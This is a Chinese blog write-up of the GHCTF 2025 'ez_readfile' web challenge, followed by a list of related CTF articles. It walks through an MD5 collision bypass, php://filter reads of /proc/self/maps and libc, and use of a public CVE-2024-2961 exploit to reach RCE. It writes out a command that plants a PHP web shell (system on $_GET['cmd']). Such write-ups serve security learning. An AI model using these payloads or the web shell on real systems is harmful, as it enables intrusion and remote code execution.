[GHCTF 2025]ez_readfile

原创 已于 2025-05-31 20:41:37 修改 · 458 阅读 · 3 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
GEO检测
标签
#php #python
于 2025-05-31 20:40:16 首次发布
Python3.8

Python3.8

Conda
Python

Python 是一种高级、解释型、通用的编程语言,以其简洁易读的语法而闻名,适用于广泛的应用,包括Web开发、数据分析、人工智能和自动化脚本

参考

https://www.nssctf.cn/note/set/11800
https://www.nssctf.cn/note/set/11874

题解

  1. md5强碰撞绕过
    https://blog.csdn.net/m0_73818134/article/details/131793815
a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

方法一:读取敏感文件 docker-entrypoint.sh

在这里插入图片描述
在这里插入图片描述

方法二:利用CVE-2024-2961实现从将php://filter任意文件读取提升为远程代码执行(RCE)

  1. 读取并保存maps文件(base64解码后)

?file=php://filter/read=convert.base64-encode/resource=/proc/self/maps

  1. 读取并保存libc.so文件(base64解码后)

?file=php://filter/read=convert.base64-encode/resource=/lib/x86_64-linux-gnu/libc-2.31.so

  1. 下载exp脚本

git clone https://github.com/kezibei/php-filter-iconv

  1. 将python脚本和maps、libc.so放在同一目录下,修改php-filter-iconv.py的配置路径
    在这里插入图片描述

cmd = “echo ‘<?php system($_GET[\"cmd\"]); ?>’ > /var/www/html/shell.php”

在这里插入图片描述
5. 运行脚本,获得paload
在这里插入图片描述
6.运行payload,页面虽然没有反应,但已生成了shell.php
在这里插入图片描述

7.通过shell.php 获取根目录的flag文件名,获得flag
在这里插入图片描述

在这里插入图片描述

小结

  • 优先考虑XXE敏感信息的读取
  • 在读取/flag时,提示没有那个文件,说明文件名是被特殊修改过的,不建议爆破文件名,因为出题人原本就不想让你猜到文件名的
  • 通过读取敏感文件 docker-entrypoint.sh以获取容器启动时对flag文件的配置,是一种解题方法
  • 在敏感文件读取不能获取的情况下,可以参考CVE-2024-2961的漏洞利用,实现从将php://filter任意文件读取提升为远程代码执行(RCE)

您可能感兴趣的与本文相关的镜像

Python3.8

Python3.8

Conda
Python

Python 是一种高级、解释型、通用的编程语言,以其简洁易读的语法而闻名,适用于广泛的应用,包括Web开发、数据分析、人工智能和自动化脚本

GHCTF-WEB-EZ ReadFile 详解(内含XXE条件下敏感信息的获取思路&失败的CVE-2024-2961脚本漏洞利用)
yeyushengfano的博客
03-16 2805
本题更重要的是在看完本WP后,获得一定的指纹收集、只能XXE情况下的敏感信息获取思路和如何想到从XXE去提升到RCE的逻辑。至于CVE-2024-2961漏洞的脚本改写,需要一定的python代码理解能力与修改能力,新人慎入、慎入啊……
GHCTF 2025 web 萌新初探wp
Python1111111的博客
03-10 3018
GHCTF WP
GHCTF-WEB-EZ ReadFile实战:从XXE到敏感文件读取的完整路径解析
lambda的博客
02-28 863
本文以GHCTFWEB题目‘EZ ReadFile’为例,详细解析了从XXE漏洞利用到最终读取敏感文件的完整实战路径。文章重点阐述了如何通过信息收集、环境判断(如容器环境)和关键文件(如启动脚本)分析,层层深入定位隐藏的flag,为CTF选手和渗透测试人员提供了从基础文件读取到高级路径突破的系统性方法论。
GHCTF2025--Web
pwfortune的博客
03-09 3019
替换为空, 使用了bottle库, 查找一些资料, 发现存在ssti模板注入, 本地搭建环境, 把waf去掉, 可以发现使用。前面一直卡在这, 没办法执行一些函数操作啥的, 就没管了, 后面wp出来之后才知道这是Sqlite注⼊ , 怪我见识短浅了。有点奇怪, 我自己本地试了一下这个cookie是可以被反序列化然后执行的, 但是靶机上一直没成功,可能没有权限还是干嘛。可以执行代码, 但是题目是没有回显的, 所以需要反弹shell, 连上自己的vps。php反序列化, 看似代码很多, 其实大都是没有用的。
GHCTF web方向题解
2301_80552914的博客
03-15 1272
根据源码分析可知,我们上传上去的文件内容会被渲染,这里就可能照成ssti漏洞根据源码,文件渲染的路径为/file/文件名这里确实成功渲染看了看黑名单,这里直接用fengjing运行即可得到payload。
如何从一名小白成为网安大神(第二十天)
Zqh1229678027的博客
06-18 408
所有网络请求由发出,而非客户端浏览器。正常场景:业务需要服务器拉取外部图片、读取远程接口、获取 URL 内容、文件下载预览等。漏洞成因:后端未对传入的目标 URL 做严格过滤、校验、拦截,可控参数直接传入请求函数。
Reactos 第 10 章 网络操作 — 10.3 Windows的网络驱动堆叠
大坡3D软件开发
06-20 379
Windows网络驱动堆叠摘要 Windows网络驱动采用分层架构,从底层到应用层依次为: NIC Miniport驱动 - 直接操作网卡硬件(如e1000.sys) NDIS库 - 提供硬件抽象层 协议驱动(LAN Manager) - 实现NDIS协议接口 TCP/IP协议栈 - 基于lwIP实现核心网络协议 TDI接口 - 内核通信接口 AFD驱动 - 内核态Winsock支持 Winsock DLL - 提供标准socket API ReactOS实现了完整的网络堆叠,各模块位于drivers/ne
用BP抓包手工测试文件上传漏洞的完整记录
2301_76277481的博客
06-22 187
这篇文章分享了作者在企业官网后台发现文件上传漏洞的实战经验。通过上传PHP文件并修改后缀名,作者成功触发了服务器执行漏洞。文章详细介绍了测试方法:观察上传逻辑、测试脚本上传、绕过MIME检测和内容检测、尝试目录跳转等。作者还总结了5步检查清单和5点修复建议,包括文件类型白名单、重命名文件、检查真实文件类型等。最终发现系统存在直接上传PHP脚本、双后缀绕过等4个问题,并协助开发完成修复。文章强调实际测试中积累经验的重要性,提醒读者要在授权环境下进行测试。
2026运动健身网站WordPress开发实战指南
qq_26894175的博客
06-18 415
2026年运动健身网站用WordPress开发,视频付费墙漏洞、多教练预约并发、Core Web Vitals达标……这些坑大多数团队都踩过。本文结合14年实战经验,系统拆解健身类WordPress网站的技术选型、功能架构、性能优化与安全加固,包含真实项目踩坑案例和可直接使用的代码示例,帮你少走三到六个月的弯路。
独立站搭建的核心注意事项
2601_94912732的博客
06-17 268
另外,一定要定期验证备份的可用性,很多人只是做了备份,从来没试过恢复,真要用到的时候才发现备份文件损坏,白做了。第四个是日志要开,很多人为了省存储空间,把web服务器的访问日志和错误日志关了,出问题之后找不到任何线索,排查起来特别难,其实日志占不了多少空间,开着日志,出问题的时候能帮你省很多排查时间,只要定期清理旧日志就可以了。第二个是做好文档记录,很多人自己搭站,觉得都是自己弄的,肯定能记住,结果过了三五个月要改配置,找了半天都找不到关键配置文件在哪,密码也忘了,还要重新梳理一遍,浪费很多时间。
2026多语言交易所系统搭建开发成品源码
最新发布
kaifaii的博客
06-23 98
简体中文、繁体中文、英语、日语、韩语、法语、德语、意大利语、马来语、蒙古语、阿拉伯语、印地语、希腊语、西班牙语、英语、菲律宾语、印尼语、荷兰语、波兰语、葡萄牙语、罗马尼亚语、俄语、泰语、土耳其语、乌克兰语、越南语等。交易所源码,前后端全开源,源码可二开,前端uniapp,后端PHP。币币交易,法币交易,大宗交易、外汇、能源、加密货币。多语言交易所系统,秒合约/永续合约/交割合约。系统内置在线客服、钱包授权登录,链上钱包充值。源码完整开源,包搭建、完整源码交付。可根据个人需求增删功能。
WEB】[网鼎杯 2018]Fakebook
weixin_73077146的博客
06-17 545
文章摘要: 本文分析了靶机渗透测试过程中发现的SSRF漏洞和SQL注入漏洞。首先通过源码审计发现UserInfo类存在SSRF风险,其get()方法未对curl请求做任何协议和地址限制。然后通过数字型注入测试确认SQL注入点,利用联合查询获取数据库信息。最终通过构造恶意序列化对象,将blog属性设为file://协议路径,利用反序列化触发SSRF读取服务器上的flag.php文件。文章详细解释了漏洞原理、利用条件和具体攻击步骤,包括绕过空格过滤、定位回显位等技巧,展示了如何结合反序列化和SSRF漏洞获取敏感
站长必存!10套无版权费 CMS,企业官网、商城、小程序全都适配
weixin_42832157的博客
06-19 281
本文整理 10 套无版权免费开源 CMS,涵盖企业站、商城、同城门户、外贸多语言站点,附带选型表格与商用避坑指南,新手站长可直接一键部署建站。
从零开始学 PHP 系列(五):Web 表单处理与文件上传——让网站“活”起来
weixin_50971816的博客
06-16 262
本篇将带你系统地学习 HTML 表单与 PHP 的交互方式,深入理解 GET 与 POST 的区别,手把手教你如何安全地接收、验证和过滤用户输入,抵御 XSS 和 CSRF 攻击。接着,你会学到文件上传的完整流程——从前端表单到后端校验,再到安全存储。最后,我们揭开 Cookie 和 Session 的面纱,实现用户登录状态的保持。
2026实测:用Gemini定位Java/PHP性能瓶颈,免费方案与调优技巧
stuartevil的博客
06-19 174
将Gemini引入性能调优流程,最大的价值是加速“问题→根因→方案”的转化过程。它不会替你做压测、不会替你改代码,但它能让你少走大量弯路。这对于时间紧迫的线上问题排查尤为重要。建议今天就找一个你项目中响应较慢的接口,把它的代码和慢查询日志丢给Gemini试试。你可能会惊讶地发现,一些困扰已久的问题,AI早已为你备好了答案。【本文完】
2026年用Gemini镜像站重构遗留代码:Java/PHP老旧项目升级实战与免费方案
stuartevil的博客
06-19 270
将Gemini纳入遗留系统重构工具链,核心价值在于大幅缩短“理解代码”这一最耗时的环节。它不是替代开发者做决策,而是帮你更快地看清全貌、发现问题、生成方案草稿,让最终决策更高效、更周全。对于国内开发者,选择RskAi这类聚合平台是启动AI辅助重构的低成本方式。目前每日提供的免费额度,足以支撑一个模块的深度分析和初步迁移。建议从系统中最让你头疼的那个“没人敢动”的模块开始,按本文的“代码考古—安全加固—框架迁移”三步法操作一遍。当你在半天内就能给出架构重建方案时,AI对遗留系统改造的实战价值便不言自明了。
如何批量抓取 TikTok 数据而不被封锁?完整指南
2611_95833734的博客
06-16 481
抓取TikTok归根结底是两个读取:解析`#__UNIVERSAL_DATA_FOR_REHYDRATION__`以获取页面中已经存在的内容,并捕获XHR响应以获取滚动时的水合内容。个人资料、帖子、评论、搜索和频道都是该单一渲染-然后提取循环的变体。在Scrapeless抓取浏览器上运行它是使渲染发生的原因——抗检测的Chromium加上住宅出口,这样TikTok便能提供真实数据,而不是一个空壳。
Laravel 6.x重磅特性全解析
zuowei2889的博客
06-22 268
Laravel 6.x主要特性包括:语义化版本控制、增强的响应工厂(支持链式构建)、新增模拟测试工具、优化的路由模型绑定(自定义键名)、Eloquent子查询增强(子查询结果作为列值)、安全强化(密码重置过期和加密算法优化)、并行测试支持以及错误追踪优化。升级建议使用composer update和迁移命令。该版本显著提升了开发体验,特别是在响应处理和数据查询方面有重要改进。
畅捷通定时任务配置与Cron自动化运维指南
06-19 251
畅捷通集成系统采用"CLI脚本 + Cron定时 + Web手动触发"的混合运维模式。支持一键全量同步,各独立脚本支持单独执行,提供 Ticket 手动补推能力。本文详解部署环境配置、定时策略设计、日志监控和异常恢复方案。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值